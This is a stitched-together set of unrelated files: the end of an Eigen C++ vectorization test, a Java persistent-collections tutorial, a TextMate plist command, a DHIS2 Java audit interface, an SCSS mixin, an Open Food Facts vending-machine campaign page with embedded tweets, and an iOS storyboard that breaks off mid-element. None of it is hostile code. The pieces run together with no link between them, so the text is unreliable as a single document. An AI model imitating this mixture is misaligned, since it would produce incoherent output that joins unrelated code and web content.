EIGEN_UNALIGNED_VECTORIZE ? (PacketSize==1 ? InnerVectorizedTraversal : LinearVectorizedTraversal) : LinearTraversal,CompleteUnrolling));
VERIFY(test_assign(Matrix3(),Matrix3().cwiseQuotient(Matrix3()),
PacketTraits::HasDiv ? LinearVectorizedTraversal : LinearTraversal,CompleteUnrolling));
VERIFY(test_assign(Matrix<Scalar,17,17>(),Matrix<Scalar,17,17>()+Matrix<Scalar,17,17>(),
EIGEN_UNALIGNED_VECTORIZE ? (PacketSize==1 ? InnerVectorizedTraversal : LinearVectorizedTraversal) : LinearTraversal,
NoUnrolling));
VERIFY(test_assign(Matrix11(),Matrix<Scalar,17,17>().template block<PacketSize,PacketSize>(2,3)+Matrix<Scalar,17,17>().template block<PacketSize,PacketSize>(8,4),
EIGEN_UNALIGNED_VECTORIZE ? InnerVectorizedTraversal : DefaultTraversal,PacketSize>4?InnerUnrolling:CompleteUnrolling));
VERIFY(test_assign(Vector1(),Matrix11()*Vector1(),
InnerVectorizedTraversal,CompleteUnrolling));
VERIFY(test_assign(Matrix11(),Matrix11().lazyProduct(Matrix11()),
InnerVectorizedTraversal,InnerUnrolling+CompleteUnrolling));
}
VERIFY(test_redux(Vector1(),
LinearVectorizedTraversal,CompleteUnrolling));
VERIFY(test_redux(Matrix<Scalar,PacketSize,3>(),
LinearVectorizedTraversal,CompleteUnrolling));
VERIFY(test_redux(Matrix3(),
LinearVectorizedTraversal,CompleteUnrolling));
VERIFY(test_redux(Matrix35(),
LinearVectorizedTraversal,CompleteUnrolling));
VERIFY(test_redux(Matrix57().template block<PacketSize,3>(1,0),
DefaultTraversal,CompleteUnrolling));
VERIFY((test_assign<
Map<Matrix<Scalar,EIGEN_PLAIN_ENUM_MAX(2,PacketSize),EIGEN_PLAIN_ENUM_MAX(2,PacketSize)>, AlignedMax, InnerStride<3*PacketSize> >,
Matrix<Scalar,EIGEN_PLAIN_ENUM_MAX(2,PacketSize),EIGEN_PLAIN_ENUM_MAX(2,PacketSize)>
>(DefaultTraversal,CompleteUnrolling)));
VERIFY((test_assign(Matrix57(), Matrix<Scalar,5*PacketSize,3>()*Matrix<Scalar,3,7>(),
InnerVectorizedTraversal, InnerUnrolling|CompleteUnrolling)));
#endif
}
};
template<typename Scalar> struct vectorization_logic_half<Scalar,false>
{
static void run() {}
};
void test_vectorization_logic()
{
#ifdef EIGEN_VECTORIZE
CALL_SUBTEST( vectorization_logic<int>::run() );
CALL_SUBTEST( vectorization_logic<float>::run() );
CALL_SUBTEST( vectorization_logic<double>::run() );
CALL_SUBTEST( vectorization_logic<std::complex<float> >::run() );
CALL_SUBTEST( vectorization_logic<std::complex<double> >::run() );
CALL_SUBTEST( vectorization_logic_half<int>::run() );
CALL_SUBTEST( vectorization_logic_half<float>::run() );
CALL_SUBTEST( vectorization_logic_half<double>::run() );
CALL_SUBTEST( vectorization_logic_half<std::complex<float> >::run() );
CALL_SUBTEST( vectorization_logic_half<std::complex<double> >::run() );
if(internal::packet_traits<float>::Vectorizable)
{
VERIFY(test_assign(Matrix<float,3,3>(),Matrix<float,3,3>()+Matrix<float,3,3>(),
EIGEN_UNALIGNED_VECTORIZE ? LinearVectorizedTraversal : LinearTraversal,CompleteUnrolling));
VERIFY(test_redux(Matrix<float,5,2>(),
EIGEN_UNALIGNED_VECTORIZE ? LinearVectorizedTraversal : DefaultTraversal,CompleteUnrolling));
}
if(internal::packet_traits<double>::Vectorizable)
{
VERIFY(test_assign(Matrix<double,3,3>(),Matrix<double,3,3>()+Matrix<double,3,3>(),
EIGEN_UNALIGNED_VECTORIZE ? LinearVectorizedTraversal : LinearTraversal,CompleteUnrolling));
VERIFY(test_redux(Matrix<double,7,3>(),
EIGEN_UNALIGNED_VECTORIZE ? LinearVectorizedTraversal : DefaultTraversal,CompleteUnrolling));
}
#endif // EIGEN_VECTORIZE
}
Introduction to Persistent Collections for Java
There are several ways to use the library:
1. Use instances of built-in persistent classes in your applications
2. Extend built-in persistent classes with new methods
3. Declare new persistent classes, or extend built-in classes, with methods and persistent fields
Examples of these 3 usages are shown below.
1. Instances of built-in persistent classes can be contained in other objects. Persistent objects act like normal Java
objects except that their lifetime can extend beyond the life of a VM instance and, if real persistent memory is
installed, beyond machine restarts.
PersistentIntArray a = new PersistentIntArray(1024); // Ints are allocated on persistent heap, initialized to 0.
a.set(0, 123); // 4-byte int value written directly to persistent heap.
a = null; // Array is unreachable. Object including persistent state
// will be garbage collected.
PersistentArray<PersistentString> strings = new PersistentArray<>(100); // 100 object references, initialized to null,
// are allocated on persistent heap.
ObjectDirectory.put("data", strings); // ObjectDirectory is an indefinitely reachable built-in map.
// No serialization is done, only object references written.
strings.set(0, new PersistentString("hello")); // Utility methods exist for creating persistent strings
strings.set(1, persistent("world")); // and (boxed) scalars.
// restart
@SuppressWarnings("unchecked")
PersistentArray<PersistentString> strings1 = ObjectDirectory.get("data", PersistentArray.class);
// no deserialization done above, retrieves object reference
assert(strings1.get(1).equals(persistent("world")));
A useful idiom for retrieving references after a restart is:
class Application {
static PersistentIntArray data;
static {
data = ObjectDirectory.get("Application_data", PersistentIntArray.class);
if (data == null) ObjectDirectory.put("Application_data", data = new PersistentIntArray(1024));
}
// ...
}
2. Non-final built-in persistent classes can be extended with new methods.
class Employee extends PersistentTuple2<PersistentLong, PersistentString> {
public Employee(PersistentLong id, PersistentString name) {
_1(id);
_2(name);
}
    public PersistentLong getId() {return _1();}
    public PersistentString getName() {return _2();}
}
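Instances of such a subclass are used like any other persistent object. A minimal usage sketch, assuming the
ObjectDirectory and persistent(...) helpers shown earlier and assuming PersistentLong exposes a long constructor
(the "employee_1" key is arbitrary):
class Example {
    void demo() {
        Employee e = new Employee(new PersistentLong(1L), persistent("Jane"));
        ObjectDirectory.put("employee_1", e);
        // restart
        Employee e1 = ObjectDirectory.get("employee_1", Employee.class);
        assert(e1.getName().equals(persistent("Jane")));
    }
}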
3. There is a general API for declaring new persistent classes, as well as extending classes with both methods and
persistent fields. Almost any kind of persistent class can be defined using this declaration API; for example, it
was used to implement all the built-in persistent classes.
Since persistent fields have to be read from and written to a different heap, and this has to be done in a fail-safe
way, persistent fields are declared with meta-field objects -- constants which are used with PersistentObject base
class accessor methods. This meta-programming aspect is a consequence of this project being implemented as a library.
The first example below shows the differences between a regular class declaration and a persistent class declaration.
Given a non-persistent class with long and String fields such as:
final class Employee {
private final long id;
private String name;
public Employee(int id, String name) {
this.id = id;
setName(name);
}
public void setName(String name) {
this.name = name;
}
public String getName() {
return name;
}
public long getId() {
return id;
}
// rest of code
}
The following implements an equivalent persistent class:
final class Employee extends PersistentObject {
private static final LongField ID = new LongField();
private static final StringField NAME = new StringField();
private static final ObjectType<Employee> TYPE = ObjectType.withFields(Employee.class, ID, NAME);
public Employee(int id, PersistentString name) {
super(TYPE); // base class needs persistent fields specification
setLongField(ID, id); // setter in PersistentObject base class
setName(name); // setObjectName(NAME, name) works too
}
private Employee(ObjectPointer<Employee> p) { // Required boilerplate "reconstructor" passes opaque pointer
super(p); // to base class. This is a non-allocating reconstruction path
} // used e.g. after restart
    public void setName(PersistentString name) {          // limiting the use of Field objects to constructors
        setObjectField(NAME, name);                        // and accessors hides the meta-programming aspect
    }                                                      // and can make maintenance easier.
public PersistentString getName() {
return getObjectField(NAME);
}
public long getId() {
return getLongField(ID);
}
// rest of code
}
The rest of the persistent class code must use these accessor methods, since there are no real persistent fields.
Other than that, the code need not be much different from the non-persistent code. This makes it practical to
"port" existing code to create persistent versions.
Other things to note about persistent class code:
- Real fields declared in a persistent class will not persist across JVM instances. When the persistent object
  is retrieved after a restart (e.g. from the ObjectDirectory or from another persistent object), the
  non-persistent fields will be reinitialized to their default Java values. This can be handled by putting
  non-persistent field initialization code in the reconstructor shown above (see the sketch after this list).
- If application logic requires that writes to multiple fields happen in a fail-safe atomic way, these writes
should be wrapped in a transaction. Methods on built-in classes execute in this fail-safe atomic way so such
transactions are not required for single method calls. Examples of transactions are shown later in this
document.
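As an illustration of the first note, here is a minimal sketch of reinitializing non-persistent state inside a
reconstructor, using only the declaration API shown above (the Badge class and its label field are hypothetical):
final class Badge extends PersistentObject {
    private static final LongField ID = new LongField();
    private static final ObjectType<Badge> TYPE = ObjectType.withFields(Badge.class, ID);
    private String label;                            // regular field: reset to null after a restart

    public Badge(long id) {
        super(TYPE);
        setLongField(ID, id);
        label = "badge-" + id;                       // initialized on first construction
    }

    private Badge(ObjectPointer<Badge> p) {          // reconstructor runs on retrieval after a restart
        super(p);
        label = "badge-" + getLongField(ID);         // rebuild transient state here
    }
}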
Such developer-defined classes, as well as non-final built-in classes can be extended.
For example, given a non-final version of the Employee class from above:
class Employee extends PersistentObject {
private static final LongField ID = new LongField();
private static final StringField NAME = new StringField();
public static final ObjectType<Employee> TYPE = ObjectType.withFields(Employee.class, ID, NAME); //TYPE is now public
public Employee(int id, PersistentString name) {
this(TYPE, id, name);
}
// add a subclassing constructor that forwards type argument to base class
protected Employee(ObjectType<? extends Employee> type, int id, PersistentString name) {
super(type);
setLongField(ID, id);
setName(name);
}
private Employee(ObjectPointer<? extends Employee> p) { // type bounds allow subtypes
super(p);
}
public void setName(PersistentString name) {
setObjectField(NAME, name);
}
// rest of code
}
An (also non-final) Engineer class that extends Employee is:
class Engineer extends Employee {
private static final StringField PROJECT = new StringField(); // new field
public static final ObjectType<Engineer> TYPE = Employee.TYPE.extendWith(Engineer.class, PROJECT); // extend type
public Engineer(int id, PersistentString name, PersistentString project) {
this(TYPE, id, name, project);
}
protected Engineer(ObjectType<? extends Engineer> type, int id, PersistentString name, PersistentString project) {
super(type, id, name);
setProject(project);
}
protected Engineer(ObjectPointer<? extends Engineer> p) {
super(p);
}
public PersistentString getProject() {
return getObjectField(PROJECT);
}
public void setProject(PersistentString project) {
setObjectField(PROJECT, project);
}
// rest of code
}
Methods in built-in persistent classes, if they modify persistent state, execute in a fail-safe way: the method
will make all changes associated with the method or will make no changes. Developer-authored classes can achieve
this same fail-safety by wrapping multiple writes to persistent state in a Transaction. For example, if adding
a Movie to a collection requires updating another collection:
PersistentArrayList<PersistentString> movies = new PersistentArrayList<>();
PersistentArrayList<PersistentString> movieIndex = new PersistentArrayList<>();
public void addMovie(PersistentString movie) {
Transaction.run(() -> {
movies.add(movie);
movieIndex.add(movie);
});
}
If something were to interrupt execution partway through the transaction body, then upon restart the persistent state
will appear as if the addMovie method was never called. On the other hand, once execution returns from the addMovie
method, a developer can be sure both adds performed inside the method are complete and the data is persistent.
To summarize, the "recipe" for declaring and implementing persistent versions of existing or imagined regular classes:
1. Inherit directly or indirectly from PersistentObject
2. Change field declarations to static Field constants
3. Aggregate these Field constants in a declared static ObjectType constant
4. Call the base class constructor passing the ObjectType
5. Write accessor methods that call base class accessors using Field objects
6. Write "reconstructor" boilerplate, forwarding ObjectPointer argument to super()
An annotation processor is being developed to give static checking of these elements for classes declared with
the @PersistentClass annotation. Following this recipe allows the creation of persistent classes whose instances
act like regular, albeit long-lived, Java objects.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>beforeRunningCommand</key>
<string>nop</string>
<key>command</key>
<string>#!/usr/bin/env sh
cat <<'RUBYEOF' > /tmp/ruby-amp-$$.rb
require "#{ENV["TM_BUNDLE_SUPPORT"]}/lib/ruby_amp.rb"
require "#{ENV["TM_BUNDLE_SUPPORT"]}/lib/ruby_tm_helpers.rb"
RubyAMP::Config.create_config(:global)
tm_open(RubyAMP::Config::CONFIG_PATHS[:global])
RUBYEOF
${TM_RUBY:-ruby} /tmp/ruby-amp-$$.rb; exit_status=$?; rm /tmp/ruby-amp-$$.rb; exit $exit_status</string>
<key>input</key>
<string>selection</string>
<key>name</key>
<string>Edit RubyAMP Global Config</string>
<key>output</key>
<string>discard</string>
<key>uuid</key>
<string>8D27E812-E9BE-4E83-95AE-483D1761CA40</string>
</dict>
</plist>
package org.hisp.dhis.trackedentityattributevalue;
/*
* Copyright (c) 2004-2020, University of Oslo
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
* list of conditions and the following disclaimer.
*
* Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
* Neither the name of the HISP project nor the names of its contributors may
* be used to endorse or promote products derived from this software without
* specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
* WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
* ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
* ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
import org.hisp.dhis.common.AuditType;
import org.hisp.dhis.trackedentity.TrackedEntityAttribute;
import org.hisp.dhis.trackedentity.TrackedEntityInstance;
import java.util.List;
/**
* @author Morten Olav Hansen <[email protected]>
*/
public interface TrackedEntityAttributeValueAuditService
{
    /** Adds an audit entry recording a change to a tracked entity attribute value. */
    void addTrackedEntityAttributeValueAudit( TrackedEntityAttributeValueAudit trackedEntityAttributeValueAudit );
    /** Returns the audit entries matching the given attributes, instances and audit type. */
    List<TrackedEntityAttributeValueAudit> getTrackedEntityAttributeValueAudits( List<TrackedEntityAttribute> trackedEntityAttributes,
        List<TrackedEntityInstance> trackedEntityInstances, AuditType auditType );
    /** Returns a page of matching audit entries, starting at offset {@code first} with at most {@code max} items. */
    List<TrackedEntityAttributeValueAudit> getTrackedEntityAttributeValueAudits( List<TrackedEntityAttribute> trackedEntityAttributes,
        List<TrackedEntityInstance> trackedEntityInstances, AuditType auditType, int first, int max );
    /** Counts the audit entries matching the given criteria. */
    int countTrackedEntityAttributeValueAudits( List<TrackedEntityAttribute> trackedEntityAttributes,
        List<TrackedEntityInstance> trackedEntityInstances, AuditType auditType );
    /** Deletes all attribute value audit entries for the given tracked entity instance. */
    void deleteTrackedEntityAttributeValueAudits( TrackedEntityInstance trackedEntityInstance );
}
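/*
 * Usage sketch (the auditService, attributes and instances variables below are
 * illustrative; AuditType comes from org.hisp.dhis.common):
 *
 *     List<TrackedEntityAttributeValueAudit> audits = auditService
 *         .getTrackedEntityAttributeValueAudits( attributes, instances, AuditType.UPDATE, 0, 50 );
 */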
// Contextual backgrounds
@mixin bg-variant($parent, $color) {
#{$parent} {
background-color: $color !important;
}
a#{$parent} {
@include hover-focus {
background-color: darken($color, 10%) !important;
}
}
}
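// Usage sketch (the selector and color variable are hypothetical):
//
//   @include bg-variant(".bg-primary", $brand-primary);
//
// emits a `.bg-primary { background-color: ... !important; }` rule plus a
// 10%-darkened hover/focus background for `a.bg-primary` links.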
<h1>Grade Your Vending Machine !</h1>
<div class="row">
<div class="small-12 medium-6 large-8 columns">
<p>In 2016, <a href="https://world.openfoodfacts.org/discover">Open Food Facts</a> goes a step further in informing the consumer. Thanks to the system of <a href="https://fr.blog.openfoodfacts.org/news/decouvrez-la-note-nutritionnelle-5-couleurs-de-500-cereales-pour-petit-dejeuner-et-22-000-autres-produits-sur-open-food-facts">colour grades A/B/C/D/E</a> established by Professor Serge Hercberg, everybody can ascertain at a single glance the nutritional quality of a food product. The grading formula, which takes into account saturated fats, sugar, salt, fibers and the content of fruit, vegetables and nuts, is already available for 54,000 products in our open database!</p>
<p id="description">The action « Grade Your Vending Machine ! » raises, on the one hand, the awareness of the consumers on the lack of product diversity in these machines. A vending machine offers more often than not bad quality products without a healthy alternative. On the other hand it is the moment to indicate the nutritional value of these products without havingg to buy them !</p>
<h2>How can you participate?</h2>
<p>Come across a vending machine? Take a photo of the (well-lit) front, and share it on <a href="https://twitter.com/openfoodfacts">Twitter</a> with the hashtag <a href="https://twitter.com/search?f=tweets&q=%23TagYourVendingMachine&src=typd">#TagYourVendingMachine</a>.</p>
<p>We will send you back the photo of your vending machine with its colored nutritional grades, which you can distribute in your company or university, and why not post it on the vending machine itself.</p>
</div>
<div class="small-12 medium-6 large-4 columns">
<img id="og_image" src="/images/misc/notetondistrib.1024x1169.jpg" alt="Grade Your Vending Machine">
</div>
</div>
<h2>Vending Machines already graded</h2>
<!-- disable_equalizer -->
<ul class="small-block-grid-1 medium-block-grid-2 large-block-grid-3">
<li>
<blockquote class="twitter-tweet" data-lang="en">
<p lang="en" dir="ltr">Vending Machine <a href="https://twitter.com/hashtag/Selecta?src=hash">#Selecta</a> on station <a href="https://twitter.com/SNCF">@SNCF</a> d'<a href="https://twitter.com/HeninBeaumont">@HeninBeaumont</a>. "Here the bad notes" <a href="https://twitter.com/hashtag/TagYourVendingMachine?src=hash">#TagYourVendingMachine </a> (<a href="https://twitter.com/OpenFoodFactsFr">@OpenFoodFactsFr</a>) <a href="https://t.co/KYEB2JPpsl">pic.twitter.com/KYEB2JPpsl</a></p>— Tacite (@TaciteFood) <a href="https://twitter.com/TaciteFood/status/712722065854480384">23 March 2016</a></blockquote>
</li>
<li>
<blockquote class="twitter-tweet" data-lang="en">
<p lang="en" dir="ltr">Few healthy choices : abstain? <a href="https://twitter.com/hashtag/Selecta?src=hash">#Selecta</a> Vending Machine at the <a href="https://twitter.com/SNCF">@SNCF</a> Chagny station. <a href="https://twitter.com/hashtag/TagYourVendingMachine?src=hash">#TagYourVendingMachine </a> (<a href="https://twitter.com/OpenFoodFactsFr">@OpenFoodFactsFr</a>) <a href="https://t.co/lQsStG1G6C">pic.twitter.com/lQsStG1G6C</a></p>— Tacite (@TaciteFood) <a href="https://twitter.com/TaciteFood/status/711188943748931584">19 March 2016</a></blockquote>
</li>
<li>
<blockquote class="twitter-tweet" data-lang="en">
<p lang="en" dir="ltr">« The Art of the Break » in a vending machine at <a href="https://twitter.com/hashtag/Eurexpo?src=hash">#Eurexpo</a> in Lyons… So as to « break » your balanced diet ? 😅 <a href="https://twitter.com/hashtag/TagYourVendingMachine?src=hash">#TagYourVendingMachine </a> (<a href="https://twitter.com/OpenFoodFactsFr">@OpenFoodFactsFr</a>) <a href="https://t.co/Pp4HnZfq6T">pic.twitter.com/Pp4HnZfq6T</a></p>— Tacite (@TaciteFood) <a href="https://twitter.com/TaciteFood/status/703291379343081473">26 February 2016</a></blockquote>
</li>
<li>
<blockquote class="twitter-tweet" data-lang="en">
<p lang="en" dir="ltr">First <a href="https://twitter.com/sodebo">@sodebo</a> vending machine tagged ! <a href="https://twitter.com/hashtag/TagYourVendingMachine?src=hash">#TagYourVendingMachine </a> (cc <a href="https://twitter.com/OpenFoodFactsFr">@OpenFoodFactsFr</a> <a href="https://twitter.com/Paris_Dauphine">@Paris_Dauphine</a>) <a href="https://t.co/EH2pdolOMz">pic.twitter.com/EH2pdolOMz</a></p>— Tacite (@TaciteFood) <a href="https://twitter.com/TaciteFood/status/700042342980521985">17 February 2016</a></blockquote>
</li>
<li>
<blockquote class="twitter-tweet" data-conversation="none" data-lang="en">
<p lang="en" dir="ltr"><a href="https://twitter.com/SNCF">@SNCF</a> <a href="https://twitter.com/Marne_la_Vallee">@Marne_la_Vallee</a> station. Not much choice… (<a href="https://twitter.com/OpenFoodFactsFr">@OpenFoodFactsFr</a> <a href="https://twitter.com/hashtag/TagYourVendingMachine?src=hash">#TagYourVendingMachine </a>) <a href="https://t.co/QqaN8oXiYc">pic.twitter.com/QqaN8oXiYc</a></p>— Tacite (@TaciteFood) <a href="https://twitter.com/TaciteFood/status/694958292293042176">3 February 2016</a></blockquote>
</li>
<li>
<blockquote class="twitter-tweet" data-conversation="none" lang="en"><p lang="en" dir="ltr">Vending machine in <a href="https://twitter.com/Univ_Savoie">@Univ_Savoie</a> (on the Jacob campus) : More choices = More E ? <a href="https://twitter.com/hashtag/TagYourVendingMachine?src=hash">#TagYourVendingMachine </a> (<a href="https://twitter.com/OpenFoodFactsFr">@OpenFoodFactsFr</a>) <a href="https://t.co/qSQRLp4alZ">pic.twitter.com/qSQRLp4alZ</a></p>— Tacite (@TaciteFood) <a href="https://twitter.com/TaciteFood/status/691915196080771072">26 January 2016</a></blockquote>
</li>
<li>
<blockquote class="twitter-tweet" data-conversation="none" lang="fr">
<p lang="fr" dir="ltr">Vending machine <a href="https://twitter.com/CCOJPL">@CCOJPL</a> : « There is ample opportunity to innovate ! » (<a href="https://twitter.com/OpenFoodFactsFr">@OpenFoodFactsFr</a>) <a href="https://twitter.com/hashtag/TagYourVendingMachine?src=hash">#TagYourVendingMachine </a> <a href="https://t.co/7f0CBzisgN">pic.twitter.com/7f0CBzisgN</a></p>— Tacite (@TaciteFood) <a href="https://twitter.com/TaciteFood/status/689151635566665728">18 January 2016</a></blockquote>
</li>
<li>
<blockquote class="twitter-tweet" data-conversation="none" lang="en">
<p lang="en" dir="ltr">« Wrong notes at the Miribel Music Academy. » <a href="https://twitter.com/hashtag/TagYourVendingMachine?src=hash">#TagYourVendingMachine </a> (<a href="https://twitter.com/OpenFoodFactsFr">@OpenFoodFactsFr</a>) <a href="https://t.co/2w4m2guwHw">pic.twitter.com/2w4m2guwHw</a></p>— Tacite (@TaciteFood) <a href="https://twitter.com/TaciteFood/status/688322701891649536">16 January 2016</a></blockquote>
</li>
<li>
<blockquote class="twitter-tweet" data-conversation="none" lang="en">
<p lang="en" dir="ltr">Mâcon Station : « Do not touch my vending machines: you're at risk of becoming very strong ». (<a href="https://twitter.com/OpenFoodFactsFr">@OpenFoodFactsFr</a>) <a href="https://t.co/kc9KoDxkrh">pic.twitter.com/kc9KoDxkrh</a></p>— Tacite (@TaciteFood) <a href="https://twitter.com/TaciteFood/status/687647829209313280">14 January 2016</a></blockquote>
</li>
<li>
<blockquote class="twitter-tweet" data-conversation="none" lang="en">
<p lang="en" dir="ltr">In 2012, <a href="https://twitter.com/SNCF">@SNCF</a> launched the "Healthier commute" campaign. In 2016, a vending machine Gare de Lyon. (<a href="https://twitter.com/OpenFoodFactsFr">@OpenFoodFactsFr</a>) <a href="https://t.co/67vAGG8sps">pic.twitter.com/67vAGG8sps</a></p>— Tacite (@TaciteFood) <a href="https://twitter.com/TaciteFood/status/685572687297687552">8 January 2016</a></blockquote>
</li>
<li>
<blockquote class="twitter-tweet" data-conversation="none" lang="en">
<p lang="en" dir="ltr">« Do you consider nutrition a fundamental science ? » You have 4 hours. At <a href="https://twitter.com/insadelyon">@insadelyon</a>… 😁 (<a href="https://twitter.com/OpenFoodFactsFr">@OpenFoodFactsFr</a>) <a href="https://t.co/qfe7cocVkL">pic.twitter.com/qfe7cocVkL</a></p>— Tacite (@TaciteFood) <a href="https://twitter.com/TaciteFood/status/685471374022938624">8 January 2016</a></blockquote>
</li>
<li>
<blockquote class="twitter-tweet" data-conversation="none" lang="en">
<p lang="en" dir="ltr">Vending machine of <a href="https://twitter.com/UnivLyon1">@UnivLyon1</a> : Hungry ? Water + Chewing-gum 👌 Yummy 😅 (<a href="https://twitter.com/OpenFoodFactsFr">@OpenFoodFactsFr</a>) <a href="https://t.co/F34eN05tEq">pic.twitter.com/F34eN05tEq</a></p>— Tacite (@TaciteFood) <a href="https://twitter.com/TaciteFood/status/685382028888518656">8 January 2016</a></blockquote>
</li>
<li>
<blockquote class="twitter-tweet" data-conversation="none" lang="en">
<p lang="en" dir="ltr">Vending Machine <a href="https://twitter.com/hashtag/Lyovel?src=hash">#Lyovel</a> at <a href="https://twitter.com/Univ_Artois">@Univ_Artois</a> : Eat healthy ? You might like compote 😁 (<a href="https://twitter.com/OpenFoodFactsFr">@OpenFoodFactsFr</a>) <a href="https://t.co/u7e9ZoyuDd">pic.twitter.com/u7e9ZoyuDd</a></p>— Tacite (@TaciteFood) <a href="https://twitter.com/TaciteFood/status/684741528544276480">6 January 2016</a></blockquote>
</li>
</ul>
<script async src="//platform.twitter.com/widgets.js" charset="utf-8"></script>
<?xml version="1.0" encoding="UTF-8"?>
<document type="com.apple.InterfaceBuilder3.CocoaTouch.Storyboard.XIB" version="3.0" toolsVersion="12120" systemVersion="16E195" targetRuntime="iOS.CocoaTouch" propertyAccessControl="none" useAutolayout="YES" useTraitCollections="YES" colorMatched="YES" initialViewController="LX8-Wu-PZs">
<device id="retina5_5" orientation="portrait">
<adaptation id="fullscreen"/>
</device>
<dependencies>
<plugIn identifier="com.apple.InterfaceBuilder.IBCocoaTouchPlugin" version="12088"/>
<capability name="Constraints to layout margins" minToolsVersion="6.0"/>
<capability name="Segues with Peek and Pop" minToolsVersion="7.1"/>
<capability name="documents saved in the Xcode 8 format" minToolsVersion="8.0"/>
</dependencies>
<scenes>
<!--Inbox-->
<scene sceneID="G8x-01-wca">
<objects>
<collectionViewController id="cmw-A4-aNK" customClass="MailCollectioViewController" customModule="MailExample" customModuleProvider="target" sceneMemberID="viewController">
<collectionView key="view" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="scaleToFill" dataMode="prototypes" id="908-WI-Mtj">
<rect key="frame" x="0.0" y="0.0" width="414" height="736"/>
<autoresizingMask key="autoresizingMask" widthSizable="YES" heightSizable="YES"/>
<color key="backgroundColor" white="1" alpha="1" colorSpace="calibratedWhite"/>
<collectionViewFlowLayout key="collectionViewLayout" minimumLineSpacing="10" minimumInteritemSpacing="10" id="vcT-nn-5Lc">
<size key="itemSize" width="386" height="141"/>
<size key="headerReferenceSize" width="0.0" height="0.0"/>
<size key="footerReferenceSize" width="0.0" height="0.0"/>
<inset key="sectionInset" minX="0.0" minY="0.0" maxX="0.0" maxY="0.0"/>
</collectionViewFlowLayout>
<cells>
<collectionViewCell opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" reuseIdentifier="MailCell" id="fLQ-Wv-7IX" customClass="MailCollectionCell" customModule="MailExample" customModuleProvider="target">
<rect key="frame" x="14" y="0.0" width="386" height="141"/>
<autoresizingMask key="autoresizingMask" flexibleMaxX="YES" flexibleMaxY="YES"/>
<view key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center">
<rect key="frame" x="0.0" y="0.0" width="386" height="141"/>
<autoresizingMask key="autoresizingMask"/>
<subviews>
<stackView opaque="NO" contentMode="scaleToFill" axis="vertical" alignment="top" spacing="2" translatesAutoresizingMaskIntoConstraints="NO" id="1HJ-g8-owo">
<rect key="frame" x="5" y="9" width="376" height="80.333333333333329"/>
<subviews>
<stackView opaque="NO" contentMode="scaleToFill" alignment="center" spacing="6" translatesAutoresizingMaskIntoConstraints="NO" id="PS0-1N-UsZ">
<rect key="frame" x="0.0" y="0.0" width="370" height="20.333333333333336"/>
<subviews>
<label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="252" verticalHuggingPriority="251" text="John Doe" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="mP8-DH-PmZ">
<rect key="frame" x="0.0" y="0.0" width="75.666666666666671" height="20.333333333333336"/>
<fontDescription key="fontDescription" style="UICTFontTextStyleHeadline"/>
<nil key="textColor"/>
<nil key="highlightedColor"/>
</label>
<label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="12:16 AM" textAlignment="right" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="1f9-ii-Bpm">
<rect key="frame" x="81.666666666666657" y="1.3333333333333321" width="268.33333333333337" height="18.000000000000004"/>
<fontDescription key="fontDescription" style="UICTFontTextStyleSubhead"/>
<color key="textColor" red="0.40000000000000002" green="0.40000000000000002" blue="0.40000000000000002" alpha="1" colorSpace="calibratedRGB"/>
<nil key="highlightedColor"/>
</label>
<imageView userInteractionEnabled="NO" contentMode="scaleToFill" horizontalHuggingPriority="251" verticalHuggingPriority="251" image="Disclosure" translatesAutoresizingMaskIntoConstraints="NO" id="hqu-np-szt">
<rect key="frame" x="356" y="3.3333333333333321" width="14" height="14.000000000000004"/>
<constraints>
<constraint firstAttribute="width" constant="14" id="Utg-5B-9hs"/>
<constraint firstAttribute="height" constant="14" id="bHQ-dV-xtu"/>
</constraints>
</imageView>
</subviews>
</stackView>
<label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Fwd: Jane's independent studies" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="Z64-RE-lES">
<rect key="frame" x="0.0" y="22.333333333333336" width="224.33333333333334" height="18"/>
<fontDescription key="fontDescription" style="UICTFontTextStyleSubhead"/>
<nil key="textColor"/>
<nil key="highlightedColor"/>
</label>
